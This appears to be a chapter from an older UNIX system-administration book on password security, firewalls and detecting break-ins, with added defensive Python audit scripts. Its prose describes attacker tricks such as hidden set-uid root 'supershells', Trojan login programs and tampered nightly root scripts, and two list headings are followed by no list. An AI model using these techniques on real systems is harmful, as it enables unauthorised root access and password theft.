Once the cracker has your password file, he or she uses a program like CRACK and a dictionary of common passwords to try to guess your passwords. To write his paper "Foiling the Cracker: A Survey of, and Improvements to, Password Security," Daniel Klein collected nearly 15,000 account entries to test for "easy-to-guess passwords." He found that 21 percent of all passwords had been broken by the first week of testing. In the end, he could crack about 25 percent of the passwords. The scariest thing is that it took him only 15 minutes to crack 386 passwords (2.7 percent). I have never managed a system for which the password file was foolproof. On a regular basis, I run my own version of CRACK against my system password files and can usually break into at least one account on every system. One password is all a cracker needs to access your computer system.
Another area in which a smart system administrator must be organized is accounts. An account should always have a password. I have seen some engineers using accounts without passwords to make it easier to share group data between users. Leaving such passwordless accounts on an Internet-connected system (or any network) is an open invitation for an intruder to gain access to information.
An account should have an expiration date. Accounts that are no longer in use are the best targets for system intruders. Once crackers break into an unused account, they can work with a smaller chance of being detected. Placing expiration dates on accounts ensures that the accounts are removed in a timely manner when they are no longer needed.
Guest accounts are a good way to lower the level of security on a system. Having accounts for which you cannot link account responsibility to a single person is dangerous. You will never know whether there is a cracker on your system or a guest is exploring. Any guest account should have a unique name and password solely restricted to that person. Each guest should be assigned their own account with an expiration date. When the account expires, the account should be closed unless it is specifically requested to be reopened. Group accounts should be avoided on the Internet system. Again, not having a link of responsibility to a single person makes it difficult to monitor the account activity of a potential intruder.
One way of protecting your password file is by using a shadow password file. If you turn on the C2 security option offered under SunOS, you can see how a shadow password file is used. The encrypted password is stored in a separate secure location from the other password information. The /etc/passwd file simply stores a placeholder entry. The examples below show the difference between a regular password file and one using a shadow password mechanism.
Here is a sample password file /etc/passwd (readable by all users):
mike:CNjlEZIADBdP6:145:17817:Mike Allison:/home2/mike:/bin/csh
jason:NZErd3xZxPkpLE:5001:20:Jason Hendrix:/home/jason:/bin/csh
caldwell:XDghFYD:350:20:Tom Caldwell:/home2/caldwell:/bin/csh
A sample password file with shadowing for /etc/passwd (readable by all users):
mike::145:17817:Mike Allison:/home2/mike:/bin/csh
jason::5001:20:Jason Hendrix:/home/jason:/bin/csh
caldwell::350:20:Tom Caldwell:/home2/caldwell:/bin/csh
A sample shadow password file (not readable by any user except the root):
mike:CNjlEZIADBdP6:6445
jason:NZErd3xZxPkpLE:6445
caldwell:XDghFYD:6445
By using the shadow password file, crackers have a much harder time getting to the information needed to guess passwords. They must find another way to break into your system and must spend more time and effort doing it.
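The account and shadow-file rules above (no passwordless accounts, hashes kept out of the world-readable file, no stray UID 0 entries) can be checked mechanically. The following audit script is an example added to this chapter, not code from the book; the sample files reuse the chapter's three illustrative entries plus constructed root, guest and "toor" lines, and the hashes are placeholders rather than real crypt(3) output.

```python
"""Audit UNIX password files for the weaknesses this chapter describes.

Example code added to this chapter, not from the book: it reports accounts
with no password, password hashes left in the world-readable /etc/passwd on
a system that uses a shadow file, accounts missing from the shadow file,
and UID 0 accounts other than root.  The sample files below reuse the
chapter's three illustrative entries plus constructed root, guest and
"toor" lines; the hashes are placeholders, not real crypt(3) output.
"""

LOCKED_MARKERS = {"*", "!", "x", "*LK*"}   # no hash here: locked or kept elsewhere


def parse_colon_file(text):
    """Yield (lineno, fields) for every non-blank, non-comment line."""
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        yield lineno, line.split(":")


def audit_passwd(passwd_text, shadow_text=None):
    """Return a list of findings as strings (empty list means nothing found).

    shadow_text=None means hashes live in /etc/passwd itself (no shadowing);
    otherwise every hash is expected only in the shadow file.
    """
    findings, uid0, names = [], [], []

    for lineno, f in parse_colon_file(passwd_text):
        if len(f) != 7:
            findings.append("passwd line %d: malformed entry (%d fields)" % (lineno, len(f)))
            continue
        name, pw, uid = f[0], f[1], f[2]
        names.append(name)
        if uid == "0":
            uid0.append(name)
        if shadow_text is None:
            if pw == "":
                findings.append("%s: no password set" % name)
            elif pw not in LOCKED_MARKERS:
                findings.append("%s: hash readable by all users (no shadow file)" % name)
        elif pw != "" and pw not in LOCKED_MARKERS:
            findings.append("%s: hash present in world-readable passwd file" % name)

    if shadow_text is not None:
        in_shadow = set()
        for lineno, f in parse_colon_file(shadow_text):
            if len(f) < 2:
                findings.append("shadow line %d: malformed entry" % lineno)
                continue
            in_shadow.add(f[0])
            if f[1] == "":
                findings.append("%s: no password set" % f[0])
        for name in names:
            if name not in in_shadow:
                findings.append("%s: no shadow entry" % name)

    for name in uid0:
        if name != "root":
            findings.append("%s: UID 0 account other than root" % name)
    return findings


# Constructed sample input: the chapter's users plus root, a passwordless
# guest account and a second UID 0 account, all in one unshadowed file.
PASSWD_UNSHADOWED = """\
root:aB3dE5fG7hI9j:0:1:Operator:/:/bin/csh
mike:CNjlEZIADBdP6:145:17817:Mike Allison:/home2/mike:/bin/csh
jason:NZErd3xZxPkpLE:5001:20:Jason Hendrix:/home/jason:/bin/csh
caldwell:XDghFYD:350:20:Tom Caldwell:/home2/caldwell:/bin/csh
guest::1001:20:Guest Account:/home/guest:/bin/csh
toor:kL2mN4oP6qR8s:0:1:Second root:/:/bin/csh
"""

# The same site after shadowing, except that jason's hash was left behind
# in /etc/passwd and guest still has no password in the shadow file.
PASSWD_SHADOWED = """\
root::0:1:Operator:/:/bin/csh
mike::145:17817:Mike Allison:/home2/mike:/bin/csh
jason:NZErd3xZxPkpLE:5001:20:Jason Hendrix:/home/jason:/bin/csh
caldwell::350:20:Tom Caldwell:/home2/caldwell:/bin/csh
guest::1001:20:Guest Account:/home/guest:/bin/csh
"""
SHADOW = """\
root:aB3dE5fG7hI9j:6445
mike:CNjlEZIADBdP6:6445
jason:NZErd3xZxPkpLE:6445
caldwell:XDghFYD:6445
guest::6445
"""

if __name__ == "__main__":
    for label, args in (("unshadowed", (PASSWD_UNSHADOWED,)),
                        ("shadowed", (PASSWD_SHADOWED, SHADOW))):
        print("==", label)
        for finding in audit_passwd(*args):
            print("  " + finding)
```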
People who use easy-to-guess passwords provide an open door to the cracker. Passwords should not be written down on paper or kept in desk drawers. Proper password education should be included in a site security policy that all users are issued when they receive accounts. The following password information should be included in such a site security policy.
Password Dos and Don'ts:
Some security experts suggest that you select a line from a favorite poem or song, then use the first letter of each word in your password. For example, "when the lights go down in the city" provides the password WtlgditC. Another recommendation is to join two words with a punctuation character. An example is toy+boat or little;bighorn.
Many system administrators run a password cracking program much like the ones crackers use. Do so at regular intervals to help catch an easy-to-guess password before an intruder does. You can tailor these cracking programs the same way a cracker does. One of the most popular cracking programs is CRACK. It can be obtained from many public domain archives on the Internet network.
A more advanced method of preventing the use of passwords that can be easily guessed is to run a password creation program that has built-in password intelligence. These programs can enforce your password policies by keeping a user from creating an unsecured password. Two such programs are NPASSWD and Passwd+.
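As an illustration of the kind of policy NPASSWD and Passwd+ enforce, here is an added example (not the source of either program) that applies the chapter's advice: it rejects short, name-derived, dictionary-based and all-lowercase passwords and accepts passphrase initials and punctuation-joined word pairs. WORDLIST is a tiny constructed stand-in for the system dictionary a cracking program uses.

```python
"""Password-quality checks of the kind NPASSWD and Passwd+ perform.

Example code added to this chapter; it is not the real NPASSWD or Passwd+
source.  It enforces the chapter's advice: reject passwords that are too
short, built from the login name or the real name in the GECOS field,
found in a word list (plain, reversed, or with digits tacked on), or made
only of lowercase letters; accept passphrase initials such as WtlgditC and
two words joined by punctuation such as toy+boat.  WORDLIST is a tiny
constructed stand-in for the system dictionary a cracking program uses.
"""

import re

MIN_LENGTH = 6
WORDLIST = {"password", "secret", "welcome", "toy", "boat", "little",
            "bighorn", "summer", "sunshine", "wizard"}


def passphrase_initials(phrase):
    """First letter of each word, first and last capitalised, as in the
    chapter's example: 'when the lights go down in the city' -> WtlgditC."""
    letters = [w[0] for w in phrase.split() if w]
    if len(letters) < 2:
        raise ValueError("phrase needs at least two words")
    letters[0] = letters[0].upper()
    letters[-1] = letters[-1].upper()
    return "".join(letters)


def name_words(account, gecos):
    """Words a guesser tries first: the login name and each part of the
    real name, lowercased."""
    words = {account.lower()}
    words.update(w for w in re.split(r"[\s,]+", gecos.lower()) if w)
    return words


def password_problems(candidate, account, gecos=""):
    """Return the list of policy violations; an empty list means acceptable."""
    problems = []
    low = candidate.lower()
    if len(candidate) < MIN_LENGTH:
        problems.append("shorter than %d characters" % MIN_LENGTH)
    if candidate.isalpha() and candidate.islower():
        problems.append("only lowercase letters")
    for w in sorted(name_words(account, gecos)):
        if len(w) >= 3 and (w in low or w[::-1] in low):
            problems.append("based on the account or real name (%s)" % w)
            break
    stripped = re.sub(r"\d+$", "", low)          # secret1 -> secret
    if {low, low[::-1], stripped, stripped[::-1]} & WORDLIST:
        problems.append("dictionary word, possibly reversed or with digits added")
    return problems


def change_password(account, gecos, candidate):
    """What a policy-enforcing passwd replacement does: accept, or explain why not."""
    problems = password_problems(candidate, account, gecos)
    if problems:
        return False, "rejected: " + "; ".join(problems)
    return True, "accepted"


if __name__ == "__main__":
    song = passphrase_initials("when the lights go down in the city")
    for acct, gecos, pw in (("mike", "Mike Allison", song),
                            ("mike", "Mike Allison", "toy+boat"),
                            ("jason", "Jason Hendrix", "hendrix"),
                            ("rao", "", "terces"),
                            ("rao", "", "Sunshine9")):
        print("%-6s %-10s %s" % (acct, pw, change_password(acct, gecos, pw)[1]))
```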
Many people don't understand how their passwords travel over the network when they log in to a computer. When a remote user logs in to an account on the Internet, the information flows over the network medium organized into packets.
Think of these packets as envelopes. Each one on the outside contains an address of where the information should go, a return address, and some other information that is needed for the network to process the packet. Finally, there is the content of the envelope, or the data area. When you use the U.S. Postal Service, you seal the envelope so that it is difficult for mail carriers to read the contents of your envelopes. On an Ethernet network, the information inside the packet is just as accessible as the address information. If you log in to a computer in New York from California, every piece of equipment that transfers your typed-in password can easily read and store this information. You basically have to trust that the management of each segment between California and New York provides a secure environment through which your packet travels.
The Ethernet network is a broadcast network. When you type your password on the remote computer, the Ethernet broadcasts the information to every computer on the network. This is akin to a person yelling in a crowded room.
If a college student sets up his or her computer in promiscuous mode, he or she can watch every packet on the network. It would not take much effort to create a packet-filtering program to watch for login packets and capture your login information (including your password). The password information is not encrypted and is readily available in the data portion of the packet.
It is a smart idea to know where your packet travels and who can see it. Does your organization share a network with the company next door? Does your computer exist on the same segment as the computer science lab at the local university?
The administrator should have an understanding of the network topology surrounding the Internet connection. (Another reason why people shouldn't use the same password for different computers.) If one of your users logs in to an account at a remote university and someone is monitoring packets, he or she can use the password information to break into your local systems.
An add-on authentication system that maintains a higher degree of security on the network is called Kerberos. Named after the three-headed watchdog that guards the gates of Hades in Greek mythology, Kerberos effectively authenticates every user for every application.
To implement this system, a server is installed to maintain three components: a database, an authentication server, and a ticket-granting server. The database contains all network user names, their passwords, the network services the users can access, and a service encryption key. To use a service, the person needs a ticket and an authenticator. This provides the security needed to ensure that the entity accessing the service remotely is actually the authorized user. The information transferred over the network is encrypted to keep crackers from viewing the access information in the packet.
Firewalls use a variety of components and configurations to reduce the risk of security problems. As mentioned earlier in this chapter, a simple screening router can be used to create an Internet firewall (Figure 11.2 shows a screening router example). Rockwell International uses a screening router as a "Telnet diode." The Telnet diode allows outgoing Telnet connections to the Internet but prohibits incoming Telnet connections to internal hosts. This arrangement enables employees to freely log in to remote Internet servers but keeps malicious users from attacking internal computers.
FIGURE 11.2. Screening router example.
Another component of a firewall is a "bastion host." Bastions are highly fortified parts of medieval castles that often focus on critical areas of defense. A bastion host is usually slated to provide many Internet services, such as electronic mail distribution, FTP file service, and Gopher services.
The bastion host usually receives extra security attention and is monitored more frequently than other network hosts. Some configurations of this type of host are called proxy gateways or application-level gateways. Software programs are run on the host and act as forwarders for services such as electronic mail or Usenet news.
The services offered on a bastion host can be interactive, such as FTP or Telnet. Digital Equipment Corporation operates bastion hosts that act as proxy gateways for FTP and Telnet. These hosts filter the FTP and Telnet packets between the Internet and the internal DEC network, transparently to the user. A bastion host can be on the Internet but be accessible only to the local internal network by using a protocol other than TCP/IP (the Internet is based on this communication protocol). See Figure 11.3.
FIGURE 11.3. One example of a bastion host with a terminal server.
These types of bastion hosts often are called hybrid gateways because they use a combination of protocols to limit Internet access to the internal network. Access to the hybrid gateway can be made through serial lines or IP tunneling. A terminal server can be used to gain serial access to the hybrid gateway and then on to the Internet.
IP tunneling means taking the Internet IP information packet and enclosing it in another protocol such as X.25. You can think of it as taking an Internet envelope of information that arrives at your corporate mail room, stuffing it in a larger envelope after verifying it is not malicious in content, and then using a different carrier service to deliver it to your office. One example of a corporate firewall that uses a hybrid design is AT&T's connection to the Internet. This design prevented the famous Internet worm from infecting any of the AT&T computers during the 1988 Internet worm crisis.
One implementation of a bastion host is to install two network boards in the computer. One network board is connected to the Internet and the other network interface is connected to your local internal network. This is known as a dual-homed gateway (see Figure 11.4).
FIGURE 11.4. A dual-homed gateway.
Traffic is not allowed to pass from one network interface board to the other. The most secure version is one in which logins are not allowed on the dual-homed gateway. If an intruder login occurs, it can be detected immediately and dealt with quickly. However, this adaptation does not provide very many Internet services to your local organization and may be overly restrictive. By forcing your users to first log in to the dual-homed gateway to use Internet connectivity, you can focus your attention on a single point of connectivity and also provide some Internet flexibility to the user.
The drawback of this configuration is that once the intruder gains access to an account on the gateway, he or she has access to every host in your internal network. The attacker also can turn on routing between the two network interfaces and open up your entire network to attack. One advantage is that you can restrict the gateway's use during certain hours of the day or shut it down if there are security problems. It is a convenient way to manage your organization's access to the Internet.
A combination of a screening router and a bastion host can be set up to provide a screened host gateway (see Figure 11.5). In this configuration, the bastion host is the only host that can be seen from the Internet network. The screening router permits only a small number of services to communicate with the bastion host.
FIGURE 11.5. Screened host gateway.
In this configuration, the screening router is sometimes referred to as the choke, because it funnels the packets through a narrow gap. The users must first log in to the bastion host to access any Internet resources. This focuses the administrator's attention on only two components: the router and the bastion host. The bastion host is also referred to as the gate in this configuration of a firewall. This firewall likewise focuses any potential intruder's attention on only two components. Such an arrangement limits the battlefield and reduces the complexity of your security risk.
Another common firewall configuration is to create a subnet that is connected to the Internet but is isolated from the rest of your local network by a screening router. You can put a bastion host or any other hosts on the isolated subnet to provide Internet services. Traffic between the Internet and the screened subnet is allowed. Traffic between your local network and the screened subnet is allowed. However, traffic between the Internet, across the screened subnet, and into your local network is blocked by the screening router. Some experts refer to this subnet as a secure subnetwork (see Figure 11.6).
FIGURE 11.6. A screened subnet example.
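The Telnet diode and the screened-subnet policy above are both expressed as ordered packet-filter rules on a stateless screening router. The following model is an example added to this chapter, not a real router configuration; the address ranges are constructed private/documentation ranges, and the diode distinguishes connection requests from replies by the TCP SYN/ACK flags, which is how a stateless router lets inside-initiated sessions through while refusing outside-initiated ones.

```python
"""Rule-by-rule model of the screening-router policies in this chapter.

Example code added to this chapter, not a real router configuration.  It
evaluates packets against an ordered rule list the way a stateless screening
router does.  The Telnet "diode" lets inside hosts open Telnet sessions to
the Internet and lets the replies back in, but drops Telnet connection
requests (SYN without ACK) arriving from outside.  The screened-subnet rules
let the Internet and the internal network each talk to the subnet while
nothing passes between the Internet and the internal network.  The address
ranges are constructed private/documentation ranges, not the book's.
"""

from dataclasses import dataclass
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("10.0.0.0/8")       # constructed: the local internal network
SCREENED = ip_network("192.0.2.0/24")     # constructed: the screened subnet
TELNET = 23


@dataclass
class Packet:
    src: str
    dst: str
    dport: int = 0
    proto: str = "tcp"
    syn_only: bool = False   # True for a TCP connection request (SYN set, ACK clear)


def zone(addr):
    a = ip_address(addr)
    if a in INTERNAL:
        return "internal"
    if a in SCREENED:
        return "screened"
    return "internet"


def between(p, a, b):
    """True when the packet travels between zones a and b in either direction."""
    return {zone(p.src), zone(p.dst)} == {a, b}


# A rule is (description, predicate, verdict); the first matching rule wins.
TELNET_DIODE = [
    ("inside may open Telnet to the Internet",
     lambda p: p.proto == "tcp" and p.dport == TELNET
     and zone(p.src) == "internal" and zone(p.dst) == "internet", "allow"),
    ("replies for sessions opened from inside may come back",
     lambda p: p.proto == "tcp" and not p.syn_only
     and zone(p.src) == "internet" and zone(p.dst) == "internal", "allow"),
    ("no new connections from the Internet to inside",
     lambda p: zone(p.src) == "internet" and zone(p.dst) == "internal", "deny"),
]

SCREENED_SUBNET = [
    ("Internet <-> screened subnet", lambda p: between(p, "internet", "screened"), "allow"),
    ("internal <-> screened subnet", lambda p: between(p, "internal", "screened"), "allow"),
    ("nothing between Internet and internal", lambda p: between(p, "internet", "internal"), "deny"),
]


def evaluate(rules, packet, default="deny"):
    """Return (verdict, matching rule description) for the packet."""
    for description, matches, verdict in rules:
        if matches(packet):
            return verdict, description
    return default, "default policy"


if __name__ == "__main__":
    cases = [
        (TELNET_DIODE, Packet("10.1.2.3", "198.51.100.7", TELNET, syn_only=True)),
        (TELNET_DIODE, Packet("198.51.100.7", "10.1.2.3", TELNET, syn_only=True)),
        (TELNET_DIODE, Packet("198.51.100.7", "10.1.2.3", 1025)),
        (SCREENED_SUBNET, Packet("198.51.100.7", "192.0.2.10", 25, syn_only=True)),
        (SCREENED_SUBNET, Packet("10.1.2.3", "192.0.2.10", 25, syn_only=True)),
        (SCREENED_SUBNET, Packet("198.51.100.7", "10.1.2.3", 25, syn_only=True)),
    ]
    for rules, p in cases:
        print("%s -> %s port %d: %s (%s)" % ((p.src, p.dst, p.dport) + evaluate(rules, p)))
```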
How do you know when your system has been compromised? It can take some effort to uncover a break-in if your system has not been significantly altered. By looking at logs, obscure events, high resource utilization, and other out-of-the-ordinary events, an administrator can detect a possible break-in.
Detecting a break-in can be done by using many of the public domain tools available on the Internet network. COPS is a good tool for detecting break-ins (it is described later in this chapter). When working on the system, you can run the w command to see what your users are doing and how much of the computer resources they are using.
Familiarity with the typical habits of your users not only helps you keep an eye out for peculiar events, but also helps you manage system resources. The command (on a BSD UNIX system) ps -ax lists all running programs (known as processes) on the computer. For example, a program named crack or scsh might appear suspicious to your security-conscious eyes. Another tool commonly used for detecting break-ins is TCP Wrappers, discussed later in this chapter and freely available on the Internet.
Another method of detecting intruders is looking in the logs. A command such as last lists all the recent logins and where they originated. The following example shows the output from the last command when run on a Sun 3/60 computer with the name server.xxx.com:
lars ttyp9 Eskimo.CPH.XXX.C Tue Nov 16 14:21 - 15:06 (00:44)
paul FTP Oak-Street.XXX.C Tue Nov 16 14:13 - 14:16 (00:02)
FTP FTP netcom4.netcom.c Tue Nov 16 13:42 - 13:55 (00:13)
price ttypd JACKSON.XXX.COM Tue Nov 16 13:38 - 15:08 (01:29)
prasad ttyp6 Drakes.XXX.COM Tue Nov 16 13:29 - 14:33 (01:03)
FTP FTP staff.cc.purdue. Tue Nov 16 13:09 - 13:11 (00:02)
FTP FTP netcom4.netc.com Tue Nov 16 12:43 - 12:50 (00:07)
james ttyp7 netcom4.netc.com Tue Nov 16 13:03 - 13:05 (00:01)
rao ttyp9 131.143.66.12 Tue Nov 16 12:40 - 14:17 (01:36)
As you can see, there are a number of local logins to the computer named server.xxx.com. Also notice that the anonymous FTP login was used to gain access to public files on the server (the user FTP). The user james logged in from a host called netcom4.netc.com right after someone used an anonymous FTP login from the same origin. This looks suspicious and may be worth investigating. Realizing that the user james was on vacation all last week can raise even more doubts about the credibility of the login.
The syslog file is another place to watch for attempts at break-ins. All attempts and successes at accessing system-level privileges are recorded in this log. Following is a sample syslog file:
Nov 28 16:15:58 spectrum login: REPEATED LOGIN FAILURES ON ttyp3 FROM mcl.xxx.edu, user1
Nov 28 19:58:11 spectrum login: ROOT LOGIN ttyp0 FROM cmcserver.XXX.COM
Nov 28 20:15:29 spectrum su: 'su root' failed for caldwell on /dev/ttyp0
The first entry shows that someone at the host mcl.xxx.edu repeatedly tried to log in and was unsuccessful. The second entry shows that the root system user logged in from the host cmcserver.xxx.com. The last entry shows that user caldwell tried to gain full-system privileges by becoming the root user. All these entries could be security-related events and should be investigated.
If you think an account may be used maliciously by someone, use the lastcomm command to display a list of commands they recently have run. Here's a sample lastcomm command output:
csh S rao __ 2.00 secs Tue Nov 23 12:42
sendmail F rao ttyp7 0.44 secs Tue Nov 23 12:49
who rao ttyp7 0.16 secs Tue Nov 23 12:49
rm rao ttyp7 0.12 secs Tue Nov 23 12:49
elm rao ttyp7 2.11 secs Tue Nov 23 12:42
The first command, csh, may be suspicious. It ran as something that had the set-uid bit turned on (the S flag shows processes that ran with another user's permission).
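The review of last and syslog output described above can be automated for a daily check. The script below is an example added to this chapter, not code from the book; it parses the chapter's own listings (embedded as sample input) and flags an interactive login from a host that had just been used for anonymous FTP, logins by users known to be away, and the three kinds of syslog message shown.

```python
"""Scan `last` and syslog output for the patterns this chapter points out.

Example code added to this chapter, not from the book.  It parses the
chapter's own `last` listing and syslog excerpt (embedded below as sample
input) and reports an interactive login from a host that had just been used
for an anonymous FTP session, logins by users known to be away, and the
syslog messages for repeated login failures, root logins and failed su.
Times are compared within one month only (the listing carries no year).
"""

import re

LAST_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<tty>\S+)\s+(?P<host>\S+)\s+\w{3}\s+\w{3}\s+"
    r"(?P<day>\d{1,2})\s+(?P<start>\d{2}:\d{2})\s+-\s+(?P<end>\d{2}:\d{2})")

SYSLOG_PATTERNS = (
    ("repeated login failures", re.compile(r"REPEATED LOGIN FAILURES ON (\S+) FROM ([^\s,]+)")),
    ("root login", re.compile(r"ROOT LOGIN (\S+) FROM (\S+)")),
    ("failed su to root", re.compile(r"'su root' failed for (\S+) on (\S+)")),
)


def _minutes(day, hhmm):
    hours, mins = hhmm.split(":")
    return int(day) * 1440 + int(hours) * 60 + int(mins)


def parse_last(text):
    """Turn `last` lines into dicts; lines still logged in or otherwise not
    matching the finished-session layout are skipped."""
    sessions = []
    for line in text.splitlines():
        m = LAST_RE.match(line.strip())
        if m:
            sessions.append({"user": m["user"], "tty": m["tty"], "host": m["host"],
                             "start": _minutes(m["day"], m["start"]),
                             "end": _minutes(m["day"], m["end"])})
    return sessions


def suspicious_logins(last_text, away_users=(), window_minutes=30):
    """Return (user, host, reason) triples worth a closer look."""
    sessions = parse_last(last_text)
    ftp_ends = {}                       # host -> end times of anonymous FTP sessions
    for s in sessions:
        if s["user"] == "FTP":
            ftp_ends.setdefault(s["host"], []).append(s["end"])
    hits = []
    for s in sessions:
        if s["user"] == "FTP":
            continue
        if any(0 <= s["start"] - end <= window_minutes for end in ftp_ends.get(s["host"], [])):
            hits.append((s["user"], s["host"],
                         "interactive login shortly after anonymous FTP from the same host"))
        if s["user"] in away_users:
            hits.append((s["user"], s["host"], "user is known to be away"))
    return hits


def syslog_events(text):
    """Return (label, detail, detail) for each security-relevant syslog line."""
    events = []
    for line in text.splitlines():
        for label, pat in SYSLOG_PATTERNS:
            m = pat.search(line)
            if m:
                events.append((label,) + m.groups())
    return events


# Sample input copied from the chapter's listings (hostnames are the
# chapter's anonymised ones).
LAST_OUTPUT = """\
lars ttyp9 Eskimo.CPH.XXX.C Tue Nov 16 14:21 - 15:06 (00:44)
paul FTP Oak-Street.XXX.C Tue Nov 16 14:13 - 14:16 (00:02)
FTP FTP netcom4.netcom.c Tue Nov 16 13:42 - 13:55 (00:13)
price ttypd JACKSON.XXX.COM Tue Nov 16 13:38 - 15:08 (01:29)
prasad ttyp6 Drakes.XXX.COM Tue Nov 16 13:29 - 14:33 (01:03)
FTP FTP staff.cc.purdue. Tue Nov 16 13:09 - 13:11 (00:02)
FTP FTP netcom4.netc.com Tue Nov 16 12:43 - 12:50 (00:07)
james ttyp7 netcom4.netc.com Tue Nov 16 13:03 - 13:05 (00:01)
rao ttyp9 131.143.66.12 Tue Nov 16 12:40 - 14:17 (01:36)
"""

SYSLOG = """\
Nov 28 16:15:58 spectrum login: REPEATED LOGIN FAILURES ON ttyp3 FROM mcl.xxx.edu, user1
Nov 28 19:58:11 spectrum login: ROOT LOGIN ttyp0 FROM cmcserver.XXX.COM
Nov 28 20:15:29 spectrum su: 'su root' failed for caldwell on /dev/ttyp0
"""

if __name__ == "__main__":
    for hit in suspicious_logins(LAST_OUTPUT, away_users={"james"}):
        print("last:   ", hit)
    for ev in syslog_events(SYSLOG):
        print("syslog: ", ev)
```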
There are a number of techniques involved in searching for attempted break-ins or figuring out what a cracker has already done (if you suspect malicious activity). The five basic techniques are as follows:
Another important thing to look for are filenames that start with a period (.) (sometimes referred to as a dot file). These files are called hidden files because they are not seen in the normal listing of a user's directories. They are used by the system to configure a user's account. Many crackers store files in a user's account with names like . .. (dot space dot dot) or .. (dot dot space space). Normal dot files found in user directories include the optional .mailrc and .exrc files. Many crackers store their files and disguise them with the name .mailrc or .exrc. (These back doors may be difficult to detect.) Because these files are typically small, check for large file sizes in the user's home directories.
Another type of special file to look for is a set-uid file. This file has the permission set so that when it runs, it has the permissions of the file owner, not the typical permissions of the user that ran the program. Many system administrators create shell scripts with the set-uid bit set so that users can have extra capabilities beyond their normal account authorizations. Crackers create root-owned set-uid scripts as a way to gain system privileges without a password. You can use the find command on a UNIX system to help locate these files. The following find command displays all set-uid files owned by the user root everywhere on the system:
find / -user root -perm -4000 -print
NOTE A set-uid root-owned program can be used by a normal account holder, but it gives him or her superuser access to various parts of the operating system.
A favorite in the cracking community is known as the supershell. A cracker takes a shell such as the Bourne shell or the C shell and changes the permission to be set-uid and the owner to be root. Then the cracker disguises it with a name like .mailrc.old and leaves it in a compromised account's home directory. To the administrator, it looks like an old copy of an electronic mail setup script. But the cracker can run it whenever he or she enters the account to instantly have a shell that effectively has all the security access of the root account (known sometimes as the superuser).
Another cracker trick is to log in to an account accessed through password cracking, copy a supershell into the account, and run the supershell. The cracker then erases the supershell from the directory. This effectively keeps the shell running in memory but removes evidence of it from the directory.
Yet another cracker trick is to look for program shell scripts that are run nightly by the root user as a batch file. Crackers typically modify small portions of these files so that each night a security hole is created to enable them to enter the system. Even though the administrator may find the security hole and repair it, during the evening the script reopens the security hole.
Many crackers install Trojan horses. These are most commonly replacement programs for login, Telnet, rlogin, and any other program that makes users type their passwords. The Trojan horse normally looks and appears much like the original program, but it collects the passwords and account names in a hidden file. It may possibly mail these passwords to another compromised account somewhere else. For this reason alone, an administrator should not log in to the system as the user root (administrators should log in as a normal user and then use the su program to gain root privileges; in this way, administrators may detect something funny before they compromise the root password). It is wise to use a nightly security program, such as COPS, to detect Trojan horse programs and alert you of their presence.
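The hiding places just described (odd dot names, oversized .mailrc or .exrc files, a set-uid root shell left under a dot name) are the kind of thing a nightly check should look for. The scanner below is an example added to this chapter and is not COPS; it covers only a few of the checks COPS makes, builds a constructed scratch home directory to try them on, and takes the privileged uid as a parameter so the demo works for an ordinary user (on a real system it is 0).

```python
"""Look through home directories for the hiding places this chapter lists.

Example code added to this chapter; it is not COPS and only a small part of
what COPS checks.  It walks a directory tree and reports set-uid files owned
by the privileged uid (especially under a dot name such as .mailrc.old),
directory or file names made of dots and spaces such as ". ..", and
configuration dot files such as .exrc that are far larger than they should
be.  privileged_uid is a parameter so the scan can be tried on a scratch
tree owned by an ordinary user; on a real system it is 0.
"""

import os
import stat
import tempfile

LARGE_DOTFILE_BYTES = 4096     # .mailrc and .exrc are normally a few hundred bytes


def odd_dot_name(name):
    """True for names like '. ..', '..  ' or '.profile ' that hide in an ls listing."""
    return name.startswith(".") and (name.strip(". ") == "" or name != name.rstrip())


def scan_tree(root, privileged_uid=0, large_dotfile=LARGE_DOTFILE_BYTES):
    """Return a list of (path, reason) findings under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if odd_dot_name(name):
                findings.append((path, "name made of dots and spaces or with trailing blanks"))
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_ISUID and st.st_uid == privileged_uid:
                reason = "set-uid file owned by privileged uid"
                if name.startswith("."):
                    reason += " hidden under a dot name"
                findings.append((path, reason))
            if name.startswith(".") and st.st_size > large_dotfile:
                findings.append((path, "dot file unusually large (%d bytes)" % st.st_size))
    return findings


def build_demo_tree(base):
    """Constructed scratch home directory (not real data) showing each case."""
    home = os.path.join(base, "home", "rao")
    os.makedirs(os.path.join(home, ". .."))
    with open(os.path.join(home, ".mailrc"), "w") as f:
        f.write("set folder=~/Mail\n")                 # normal, small
    with open(os.path.join(home, ".exrc"), "wb") as f:
        f.write(b"\0" * 20000)                         # far too big for an editor rc file
    stash = os.path.join(home, ".mailrc.old")
    with open(stash, "w") as f:
        f.write("placeholder standing in for a copied shell program\n")
    os.chmod(stash, 0o4755)                            # set-uid bit, owned by whoever runs this
    return home


def demo():
    """Build the scratch tree in a temporary directory, scan it, and return
    the findings keyed by file name."""
    base = tempfile.mkdtemp(prefix="dotfile-scan-")
    build_demo_tree(base)
    return {(os.path.basename(p), reason)
            for p, reason in scan_tree(base, privileged_uid=os.getuid())}


if __name__ == "__main__":
    for name, reason in sorted(demo()):
        print("%-14r %s" % (name, reason))
```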
CERT is the Computer Emergency Response Team formed by the Defense Advanced Research Projects Agency (DARPA) in November 1988, in response to the Internet worm incident. The charter of CERT is to facilitate its response to computer security events involving Internet hosts, to raise the community's awareness of computer security issues, and to conduct research in the area of improving system security. CERT provides 24-hour technical assistance in response to computer security incidents, product vulnerability assistance, technical security documents, and security seminars.
If you encounter a security problem such as a break-in, a virus, a worm, or a software bug that creates a security hole, contact an Emergency Response Center. CERT is a common group to contact. For more information about CERT, read the newsgroups comp.security.announce and comp.security.misc.
The first mention of a computer worm was in the classic 1975 science fiction novel, The Shockwave Rider, by John Brunner. In the book, the tapeworm was a program that lived inside computers and spread to other machines. Xerox went on to experiment with worms and reported them in the Communications of the ACM.
